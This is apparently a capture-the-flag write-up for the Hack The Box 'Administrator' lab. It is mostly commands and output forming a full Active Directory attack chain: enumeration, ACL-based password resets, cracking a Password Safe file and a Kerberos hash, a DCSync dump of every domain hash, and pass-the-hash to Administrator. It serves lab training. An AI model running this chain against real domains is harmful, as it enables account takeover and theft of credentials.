htb-administrator
initial acess provided by htb
olivia /ichliebedich
—
Open ports:
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024–11–12 01:39:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
echo “10.10.11.42 administrator.htb” | sudo tee -a /etc/hosts
Enumeration :
PowerView :
┌──(bolke㉿bolke)-[~/htb/administrator]
└─$ powerview administrator.htb/olivia:’ichliebedich’@administrator.htb
Logging directory is set to /home/bolke/.powerview/logs/administrator-olivia-administrator.htb
[2025-04-21 21:23:03] [Storage] Using cache directory: /home/bolke/.powerview/storage/ldap_cache
(LDAP)-[dc.administrator.htb]-[ADMINISTRATOR\olivia]
PV > Get-NetUser olivia
BloodHound :
bloodhound-python -k -c all –disable-pooling -w 1 -u olivia -p ‘ichliebedich’ -d administrator.htb -dc administrator.htb -ns 10.10.11.42 –dns-tcp –zip –dns-timeout 120
LDAP Domain Dump
ldapdomaindump administrator.htb -u ‘administrator\olivia’ -p ‘ichliebedich’
[*] Connecting to host…
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Enum4Linux
enum4linux-ng -A -u ‘olivia’ -p ‘ichliebedich’ 10.10.11.42
SMBclient
smbclient -L //administrator.htb -U olivia@administrator.htb
Password for [olivia@administrator.htb]:ichliebedich
Sharename Type Comment
——— —- ——-
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to administrator.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 — no workgroup available
netexec rid-brute
netexec smb administrator.htb -u “olivia” -p ‘ichliebedich’ –rid-brute 5000 | grep SidTypeUser
SMB 10.10.11.42 445 DC 500: ADMINISTRATOR\Administrator (SidTypeUser)
SMB 10.10.11.42 445 DC 501: ADMINISTRATOR\Guest (SidTypeUser)
SMB 10.10.11.42 445 DC 502: ADMINISTRATOR\krbtgt (SidTypeUser)
SMB 10.10.11.42 445 DC 1000: ADMINISTRATOR\DC$ (SidTypeUser)
SMB 10.10.11.42 445 DC 1108: ADMINISTRATOR\olivia (SidTypeUser)
SMB 10.10.11.42 445 DC 1109: ADMINISTRATOR\michael (SidTypeUser)
SMB 10.10.11.42 445 DC 1110: ADMINISTRATOR\benjamin (SidTypeUser)
SMB 10.10.11.42 445 DC 1112: ADMINISTRATOR\emily (SidTypeUser)
SMB 10.10.11.42 445 DC 1113: ADMINISTRATOR\ethan (SidTypeUser)
SMB 10.10.11.42 445 DC 3601: ADMINISTRATOR\alexander (SidTypeUser)
SMB 10.10.11.42 445 DC 3602: ADMINISTRATOR\emma (SidTypeUser)
SMBclient finds no more info in sysvol
smbclient //administrator.htb/SYSVOL -U olivia
Password for [WORKGROUP\olivia]: ichliebedich
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 4 21:48:08 2024
.. D 0 Fri Oct 4 21:48:08 2024
administrator.htb Dr 0 Fri Oct 4 21:48:08 2024
5606911 blocks of size 4096. 1319026 blocks available
smb: \> cd administrator.htb
smb: \administrator.htb\> ls
. D 0 Fri Oct 4 21:54:15 2024
.. D 0 Fri Oct 4 21:48:08 2024
DfsrPrivate DHSr 0 Fri Oct 4 21:54:15 2024
Policies D 0 Fri Oct 4 21:48:32 2024
scripts D 0 Fri Oct 4 21:48:08 2024
5606911 blocks of size 4096. 1319026 blocks available
RPCClient enum users
rpcclient -U ‘olivia’ 10.10.11.42
Password for [WORKGROUP\olivia]: ichliebedich
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[olivia] rid:[0x454]
user:[michael] rid:[0x455]
user:[benjamin] rid:[0x456]
user:[emily] rid:[0x458]
user:[ethan] rid:[0x459]
user:[alexander] rid:[0xe11]
user:[emma] rid:[0xe12]
rpcclient $>
netexec verify creds working for winrm
netexec winrm administrator.htb -u ‘administrator\olivia’ -p ‘ichliebedich’
WINRM 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.10.11.42 5985 DC [+] administrator\olivia:ichliebedich (Pwn3d!)
netexec verify creds working for smb and ldap
netexec smb administrator.htb -u ‘administrator\olivia’ -p ‘ichliebedich’
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator\olivia:ichliebedich
netexec ldap administrator.htb -u ‘administrator\olivia’ -p ‘ichliebedich’
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.42 389 DC [+] administrator\olivia:ichliebedich
evil-winrm into the box
evil-winrm –ip administrator.htb -u ‘olivia’ -p ‘ichliebedich’
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>
.
password spraying is working : no account lockout ( net accounts ) shows this) , but this is not our route
┌──(puck㉿kali)–[~/htb/administrator]
└─$ nxc smb administrator.htb -u olivia michael -p /home/puck/htb/administrator/users.txt –continue-on-success
We go for do more Bloodhound
bloodhound finds [ outbound control of user olivia ]
olivia has full control over michael
I used Powerview to reset Michaels’password
*Evil-WinRM* PS C:\windows\tasks> upload PowerView.ps1
Info: Uploading /home/puck/htb/administrator/PowerView.ps1 to C:\windows\tasks\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\tasks> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\windows\tasks> $UserPassword = ConvertTo-SecureString ‘Password123!’ -AsPlainText -Force
*Evil-WinRM* PS C:\windows\tasks> Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword
*Evil-WinRM* PS C:\windows\tasks>
Next winrm as michael to the box
evil-winrm –ip administrator.htb -u ‘michael’ -p ‘Password123!’
After setting in bloodhound user michael as owned , we find in his outbound connections :
michael forcechangepasword on benjamin
The user MICHAEL@ADMINISTRATOR.HTB has the capability to change the user BENJAMIN@ADMINISTRATOR.HTB’s password without knowing that user’s current password.
So we use Powerview again to set Benjamin’s password
*Evil-WinRM* PS C:\temp> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\temp> $UserPassword = ConvertTo-SecureString ‘Password123!’ -AsPlainText -Force
*Evil-WinRM* PS C:\temp> Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword
*Evil-WinRM* PS C:\temp> whoami
administrator\michael
*Evil-WinRM* PS C:\temp>
We verify if password changed succesfully with netexec
netexec smb administrator.htb -u ‘administrator\benjamin’ -p ‘Password123!’
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator\benjamin:Password123!
Benjamin cannot winrm into the box ( but his Local Group Memberships is *Share Moderators )
netexec ftp administrator.htb -u ‘administrator\benjamin’ -p ‘Password123!’
FTP 10.10.11.42 21 administrator.htb [*] Banner: Microsoft FTP Service
FTP 10.10.11.42 21 administrator.htb [+] benjamin:Password123!
But he can ftp to the box
ftp administrator.htb
Connected to dc.administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:puck): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||59070|)
125 Data connection already open; Transfer starting.
10–05–24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||59071|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************| 952 75.42 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (73.49 KiB/s)
ftp>
Crack the hash
hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Now we have
Backup.psafe3:tekieromucho
Session……….: hashcat
Status………..: Cracked
Hash.Mode……..: 5200 (Password Safe v3)
We install the pwsafe-3.67.0.exe app on our windows machine, and open the password manager backup file
With the creds found of Emily we continue
netexec smb administrator.htb -u ‘administrator\emily’ -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
and winrm to box as emily to get user.txt
evil-winrm –ip administrator.htb -u ’emily’ -p ‘UXLCI5iETUsIBoFVTj8yQFKoHjXmb’
*Evil-WinRM* PS C:\Users\emily\desktop> dir
Directory: C:\Users\emily\desktop
Mode LastWriteTime Length Name
—- ————- —— —-
-a—- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar— 11/12/2024 6:03 AM 34 user.txt
In Bloodhound we mark Emily as owned , and find in her outbound connections to: The user EMILY@ADMINISTRATOR.HTB has generic write access to the user ETHAN@ADMINISTRATOR.HTB.
so we use targetedkerberoast herefore
1st sync the time clock to the DC
sudo ntpdate administrator.htb
2024–11–14 01:58:02.198428 (+0100) +25200.700492 +/- 0.007306 administrator.htb 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25200.700492
Targeted Kerberoast
Background
A Service Principal Name (SPN) is a unique identifier that associates a service instance with a service account in Kerberos. Kerberoasting is an attack where an authenticated user requests a ticket for a service by it’s SPN, and the ticket that comes back is encrypted with the password of the user associated with that service. If that password is weak, it can be broken in offline brute force. rather than GenericWrite).
Strategy
To perform a targeted kerberoast, I’ll use the GenericWrite privilege to give ethan an SPN. Then I can request a ticket for that fake service, and get a ticket encrypted with ethan’s password hash. If that password is weak, I can crack it offline.
┌──(bolke㉿bolke)-[~]
└─$ git clone https://github.com/ShutdownRepo/targetedKerberoast.git
Cloning into 'targetedKerberoast'...
remote: Enumerating objects: 76, done.
remote: Counting objects: 100% (33/33), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 76 (delta 19), reused 18 (delta 14), pack-reused 43 (from 1)
Receiving objects: 100% (76/76), 252.27 KiB | 3.32 MiB/s, done.
Resolving deltas: 100% (30/30), done.
┌──(bolke㉿bolke)-[~]
└─$ cd targetedKerberoast
┌──(bolke㉿bolke)-[~/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$d5e8e07a20cb82d9d4f067f5b6af370f$5b30d74680b2c8a7fb2f9ee2f6e0aa0b14e5235f201a823cd60adc323a64170a3eb9e4f89d6b47bd4cb475b2cfe4052b3efd66da064ce8366b90b24e97b7cf3eee927b7052f678785c164a29886c8447e9ccf9001664532af4b7fc3169ad098ec4f693c38851c8daf1ee85dc24af02937d5e06d4b2b43433353621be40baa7bd6b45291ce629cbc66d679667fd90219f5462e01f8fe0a9eb6d21eb04fbfdf14a3d146da96ba8a63b46fdb11eaa98a1af899ce2e5ce0a0047aed496459f72162b0bae6fd5ee0cbafc2ed94713a41b720809f0bbe739aec9dde9e77cc07b9b53c77e035d5218dcfdd3f076597ed040d143b9ef8cfbf76419df677d08aa24cc91ea4b8e4598b0090175fe61053b978e8f93248678d1afd4b5407376309bc2d46d0aab4355a97a4d45715ee04f1b3bc45fa5f69db2b9a7683e1b6cfe0072c200f24baf68e3f0ea17343014d377d07a02f797dd728f545e7db049c57c1b8c73ac92d50bfc8bd0fb626f0a9e9d9c07bbfd6cbca41016699aa02fa7bd3165432b9f22d39d69c22004f6bdc17dcfcbc1c5e812b8cb1bbc5e32133058e00c1f1873583e1ea96c990b6a5bf119bb5bec23468be6a215a8b5691db17a1f0e5a24039e115ae22656c10e552cb9306e149716f69cbe52c4658921dc6d31dd2e4555573199c9246c343aa97961146637cede59fb9c39ef131581018e74a48a74a320162f1ef50633a4b896047f88847720a3994c794b552e85a3777774d70bc5e5d7fd843a1cb2894bfc8b839a83a54f9060451fe2bc392f854a4c4e882cd92e1fe7b220af7a323226823252f7d2499492be7c335d37977db4138a841c40f38c173be4db84812dfdcafb011d3fef3a12c0f57cda4f26583792cd6b1ad3e7b5fcc91bc6a8e217e3092a6a6196136ea4d2e13f8bb85ef957919bca4812b4ab88491bad8446aa23436079eb476ad9d1dc88cbd4496670f53bc9b12701c89d0586a8b98fa51b4e99974f703d111c395f7aa68364e7651a07944d4a360dc60f4c86c11f488ddc2f183cdc57d5f34ee4d1abed7ddd8f1e615299abbf4d1f6c062f261c8d099cdd961b6628d0832113e452738b8db266babb24168f5133a28bd9a787b7845ff0f152454f21b194e8aea5923c36d8f6f45a7b9209abe9549f6f82a57a761d796fae0c483363df16b611e8a819b80c3c8f038a73efe008a4d282d33a67831965354c3e1a0381ec12cb06172896b7a7307c4cbbc282ee3d1ec61cf66cb27e4865f9e8c504466a7a7f6f4dc45ebe10ca2b5e4a5992417e84638dbc9c987526e2d15c15c50392325553f7a73da5d2a21d6d801ca0167d20f6dd75c8c3ce9e5cc214cc082a98dd0749a37edb40fa04c40515839ba91f5267f02984d674ab418ae19fbeecd791b288493e56b7be831f150d28c406552ddee9f87e0d332cc60d596971aad0a00497ba9c39eb5d2b7e2f415876bac2476918dd79bba5d78590eaabea095d744066eec4ece374cb2f3bf2e0fcc87ec3a3af2fe8ae56e5a01d5655f7e02c842c6bcd
[VERBOSE] SPN removed successfully for (ethan)
.
┌──(puck㉿kali)–[~/htb/administrator]
└─$ python3 /home/puck/vulnlab/delegate/targetedKerberoast/targetedKerberoast.py -v -d ‘administrator.htb’ -u ’emily’ -p ‘UXLCI5iETUsIBoFVTj8yQFKoHjXmb’
Crack this kerberos hash
hashcat -a 0 -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt -o cracked
pw = limpbizkit
netexec to verify creds
netexec smb administrator.htb -u ‘administrator\ethan’ -p limpbizkit
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator\ethan:limpbizkit
In Bloodhound we mark Ethan as owned , and find in his outbound connections to:
bloodhound says:
The user ETHAN@ADMINISTRATOR.HTB has the DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All privilege on the domain ADMINISTRATOR.HTB.
so we use impacket-secretsdump to get all hashes
impacket-secretsdump ‘administrator/ethan:limpbizkit’@dc.administrator.htb > allhashes.txt
Cat the hashes
cat allhashes.txt
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[–] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:7a206ee05e894781b99a0175a7fe6f7e1242913b2ab72d0a797cc45968451142
administrator.htb\michael:aes128-cts-hmac-sha1-96:b0f3074aa15482dc8b74937febfa9c7e
administrator.htb\michael:des-cbc-md5:2586dc58c47c61f7
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:36cfe045bc49eda752ca34dd62d77285b82b8c8180c3846a09e4cb13468433a9
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:2cca9575bfa7174d8f3527c7e77526e5
administrator.htb\benjamin:des-cbc-md5:49376b671fadf4d6
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up…
And Finaly winrm to the box as Administrator
evil-winrm –ip administrator.htb -u ‘administrator’ -H ‘3dc553ce4b9fd20bd016e098d2d2fd2e’
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
That was Fun.
—
┌──(puck㉿kali)-[~/htb/administrator]
└─$ evil-winrm –ip administrator.htb -u ‘administrator’ -H ‘3dc553ce4b9fd20bd016e098d2d2fd2e’
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
—- ————- —— —-
-ar— 11/12/2024 6:03 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop>